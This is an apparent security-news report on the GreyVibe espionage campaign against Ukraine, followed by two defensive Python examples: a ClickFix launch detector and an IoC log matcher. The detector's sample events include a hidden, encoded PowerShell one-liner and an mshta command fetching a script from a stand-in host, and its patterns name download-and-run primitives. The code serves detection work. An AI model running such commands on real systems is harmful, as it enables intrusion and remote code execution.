The Russian threat group tracked as GreyVibe uses AI-generated decoys and a rich set of custom malware tools to target organizations in the military, government, civilian, and business sectors.
Although this cyberespionage campaign has been active since at least August 2025 and appears to be aligned with the interests of the Russian state, researchers cannot confidently classify it as a nation-state operation.
Cybersecurity firm WithSecure discovered the activity in January and determined it was focused on Ukraine or Ukraine-related entities.
Links to Russian-speaking attackers are supported by the malware panel language, comments in code artifacts, and the command and control (C2) server time being set to UTC+3 (Moscow time).
According to the researchers, GreyVibe used several attack chains against its targets, including:
- PhantomMail: Spear-phishing emails that deliver malicious ZIP/RAR archives via Google Drive and 4sync links, using decoy PDFs and fake error messages during malware deployment. The observed decoys impersonated Ukrainian government, emergency, telecommunications, and energy utilities.
- PhantomClick: Fake CAPTCHA/ClickFix pages masquerading as Zoom and LAPAS sites trick victims into running self-infecting commands through a fake Cloudflare verification prompt.
- PrincessClub: A fake Ukrainian adult/dating website that distributes the Android spyware FallSpy and the Windows malware PhantomRelay/LegionRelay. The operator used a fake female Telegram persona and later added a WebRTC-based live call that could capture the victim's audio and video.
- DroneLink: An FPV drone and UAV-themed fake Ukrainian military charity website that shared infrastructure and tools with the PrincessClub campaign.
- Nebo: A fake "СПО НЕБО" Russian military communications login page that may have been designed to trick Ukrainian military personnel into believing they are accessing a Russian military terminal.
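The PhantomClick chain relies on the victim pasting a command that the fake verification page hands them. From a defender's side, the useful telemetry is process creation: the pasted command shows up as a script host started directly by the Windows shell. The following Python is an added example, not code from WithSecure or from the report, and it assumes the commonly reported ClickFix pattern (a one-liner pasted into the Run dialog, which makes explorer.exe the parent process); the events are constructed sample data in a Sysmon-like shape, and the interpreter list and command-line traits are heuristics chosen here, not indicators from the page.

```python
import re
from typing import Dict, List, Tuple

# Constructed process-creation events in a Sysmon-like shape (sample data, not WithSecure telemetry).
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {  # pasted one-liner: hidden window, encoded payload, policy bypass
        "parent": r"C:\Windows\explorer.exe",
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "cmdline": "powershell.exe -w hidden -NoProfile -ep bypass -enc "
                   "QQBBAEEAQQBBAEEAQQBBAEEAQQBBAEEAQQBBAEEA",  # constructed placeholder; decodes to 'AAAAAAAAAAAAAAA'
    },
    {  # "verification" step that fetches a remote script through mshta
        "parent": r"C:\Windows\explorer.exe",
        "image": r"C:\Windows\System32\mshta.exe",
        "cmdline": "mshta https://verify.invalid/captcha",  # constructed URL
    },
    {  # legitimate: script started from an existing shell, no explorer parent
        "parent": r"C:\Program Files\PowerShell\7\pwsh.exe",
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "cmdline": r"powershell.exe -File C:\scripts\backup.ps1",
    },
    {  # legitimate: an admin opening a console from the Run dialog
        "parent": r"C:\Windows\explorer.exe",
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "cmdline": "powershell.exe",
    },
    {  # noise: not a script host at all
        "parent": r"C:\Windows\explorer.exe",
        "image": r"C:\Windows\System32\notepad.exe",
        "cmdline": "notepad.exe notes.txt",
    },
]

# Interpreters such prompts usually ask the victim to run (assumption based on common ClickFix reporting).
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe", "wscript.exe", "cscript.exe"}

# Command-line traits that are rare in interactive use but typical of a pasted one-liner.
SUSPICIOUS_FLAGS: List[Tuple[re.Pattern, str]] = [
    (re.compile(r"(?:^|\s)-(?:w|win|windowstyle)\s+hidden\b", re.I), "hidden window"),
    (re.compile(r"(?:^|\s)-(?:e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}", re.I), "encoded command"),
    (re.compile(r"(?:^|\s)-(?:ep|executionpolicy)\s+bypass\b", re.I), "execution policy bypass"),
    (re.compile(r"https?://", re.I), "remote URL on the command line"),
    (re.compile(r"\b(?:iex|invoke-expression|downloadstring|invoke-webrequest)\b", re.I), "download-and-run primitive"),
]


def basename(path: str) -> str:
    """Last path component, lower-cased, tolerant of either slash style."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def score_event(ev: Dict[str, str]) -> List[str]:
    """Return the reasons an event looks like a ClickFix-style launch, or [] if it does not.

    Gate: a script host spawned directly by explorer.exe (what the Run dialog produces).
    Then require at least one suspicious command-line trait, so a console opened by
    hand is not flagged on the parent/child relationship alone.
    """
    if basename(ev["parent"]) != "explorer.exe" or basename(ev["image"]) not in SCRIPT_HOSTS:
        return []
    reasons = [f"{basename(ev['image'])} spawned by explorer.exe"]
    reasons += [label for rx, label in SUSPICIOUS_FLAGS if rx.search(ev["cmdline"])]
    return reasons if len(reasons) >= 2 else []


def find_clickfix_candidates(events: List[Dict[str, str]]) -> List[Tuple[int, List[str]]]:
    """Index every event that scores, preserving input order."""
    return [(i, r) for i, ev in enumerate(events) if (r := score_event(ev))]


if __name__ == "__main__":
    for idx, reasons in find_clickfix_candidates(SAMPLE_EVENTS):
        print(f"event {idx}: " + "; ".join(reasons))
```

Run against the sample events, only the first two are reported: the bare `powershell.exe` opened from the Run dialog has the same parent but no suspicious trait, and the backup script has a shell, not explorer.exe, as its parent. The two-reason threshold is what keeps the rule quiet on ordinary administration; tune `SCRIPT_HOSTS` and `SUSPICIOUS_FLAGS` to what your fleet actually runs.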
The variety and quality of these lures is notable, and WithSecure says this is the result of using several AI tools, including ChatGPT, Ideogram AI, and Google Gemini, to generate detailed and realistic content to support them.

Source: WithSecure
The use of AI has also extended to the creation of tools, with the researchers mentioning LOOKVALPS, LOOKVALJS, DAYLIGHT, and TEASOUP. These are all custom obfuscators that appear to have been developed with the help of an LLM.
A PowerShell-based remote access Trojan named LegionRelay was also likely developed with the help of AI tools, the researchers said.
LegionRelay supports file theft, screenshot capture, browser credential theft, Telegram and WhatsApp data exfiltration, and RDP access setup.
Another malware used by GreyVibe is PhantomRelay, which is also a PowerShell RAT. The malware supports system fingerprinting, dynamic script loading, and PowerShell and Windows command execution.
Source: WithSecure
Finally, the hackers used the purely informational Android spyware FallSpy in the PrincessClub and Nebo campaigns.
The malware collects contact lists, call logs, device and network information, location data, media files, and SIM information.
WithSecure notes that while GreyVibe's activity is consistent with that of a nation-state, the attacker "lacked the level of sophistication and operational discipline typically associated with mature nation-state attackers."
Moreover, although the PhantomRelay malware has also been observed in cybercriminal activity, the researchers were able to distinguish that usage from the state-aligned activity. This led the researchers to believe that GreyVibe may include "current or former cybercriminals."
Some evidence for this theory includes the use, in early and test samples, of a proprietary ISO builder associated with a group of former Trickbot members (UAC-0098) that targeted Ukraine at the start of the Russian invasion.
Additionally, the attackers uploaded development and test samples to public scanning platforms, which is not common among nation-state actors. A cryptocurrency miner was also deployed on some victim machines.
The researchers are unsure whether "former or current cybercrime members have been absorbed into state-sponsored groups, operate independently but with state-directed missions, or form hybrid teams that include state-affiliated and cybercrime members."
Organizations can use the indicators of compromise (IoCs) provided by WithSecure to set up defenses against GreyVibe's malicious activity.
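Putting a published IoC list to work means matching it against what you already log, and the match rules differ by indicator type: a domain indicator should also hit its subdomains, an IP indicator must match a whole address and not a prefix of a longer one, and a hash should match regardless of letter case. The following Python is an added example, not code from WithSecure or from the report; the indicator values are placeholders to be replaced with the real ones from WithSecure's IoC list, and the log lines are constructed sample data.

```python
import ipaddress
import re
from typing import Dict, List, Tuple

# Placeholder indicator list in a "type,value" text format. These are NOT WithSecure's
# indicators; substitute the real values from the report before use.
IOC_TEXT = "\n".join([
    "# type,value",
    "domain,replace-with-withsecure-domain.example",
    "ip,203.0.113.10",                     # TEST-NET-3 address, constructed
    "sha256," + "deadbeef" * 8,            # obvious placeholder hash
])

# Constructed proxy/EDR log lines (sample data, not real telemetry).
LOG_LINES = [
    "2025-08-12T09:14:02Z proxy 10.0.0.5 GET https://cdn.replace-with-withsecure-domain.example/update.zip 200",
    "2025-08-12T09:15:44Z proxy 10.0.0.7 CONNECT 203.0.113.10:443 -",
    "2025-08-12T09:16:01Z edr host-07 file_create C:\\Users\\u\\Downloads\\report.zip sha256=" + "DEADBEEF" * 8,
    "2025-08-12T09:17:30Z proxy 10.0.0.9 GET https://docs.example.org/ 200",
    "2025-08-12T09:18:02Z proxy 10.0.0.9 CONNECT 203.0.113.100:443 -",   # longer address, must NOT match
]

HOST_RX = re.compile(r"https?://([^/\s:]+)", re.I)
# Whole dotted-quad tokens only: no digit or dot may touch either end of the match.
IP_RX = re.compile(r"(?<![\d.])(\d{1,3}(?:\.\d{1,3}){3})(?![\d.])")
SHA256_RX = re.compile(r"\b[0-9a-f]{64}\b", re.I)


def parse_iocs(text: str) -> Dict[str, set]:
    """Parse 'type,value' lines into lower-cased sets; '#' lines and blanks are skipped."""
    iocs: Dict[str, set] = {"domain": set(), "ip": set(), "sha256": set()}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        kind, value = (p.strip().lower() for p in line.split(",", 1))
        if kind not in iocs:
            raise ValueError(f"unknown IoC type {kind!r}")
        if kind == "ip":
            ipaddress.ip_address(value)  # reject malformed entries at load time
        iocs[kind].add(value)
    return iocs


def domain_hit(host: str, domains: set) -> str:
    """Exact match or any subdomain of a listed domain ('cdn.x.example' hits 'x.example')."""
    host = host.lower().rstrip(".")
    for d in domains:
        if host == d or host.endswith("." + d):
            return d
    return ""


def scan_line(line: str, iocs: Dict[str, set]) -> List[Tuple[str, str]]:
    """All (type, indicator) pairs that a single log line matches."""
    hits: List[Tuple[str, str]] = []
    for host in HOST_RX.findall(line):
        if d := domain_hit(host, iocs["domain"]):
            hits.append(("domain", d))
    for ip in IP_RX.findall(line):
        if ip in iocs["ip"]:          # full-token match: 203.0.113.100 never hits 203.0.113.10
            hits.append(("ip", ip))
    for h in SHA256_RX.findall(line):
        if h.lower() in iocs["sha256"]:
            hits.append(("sha256", h.lower()))
    return hits


def scan_logs(lines: List[str], iocs: Dict[str, set]) -> Dict[int, List[Tuple[str, str]]]:
    """Map line index -> hits, for lines that matched at least one indicator."""
    return {i: h for i, line in enumerate(lines) if (h := scan_line(line, iocs))}


if __name__ == "__main__":
    for idx, hits in scan_logs(LOG_LINES, parse_iocs(IOC_TEXT)).items():
        print(f"line {idx}: {hits}")
```

On the sample data the first three lines hit (subdomain, exact IP, upper-case hash) and the last line does not, even though the indicator address is a textual prefix of it. That last case is the one a naive substring search gets wrong, and it is why the IP matcher works on whole tokens rather than on `in`.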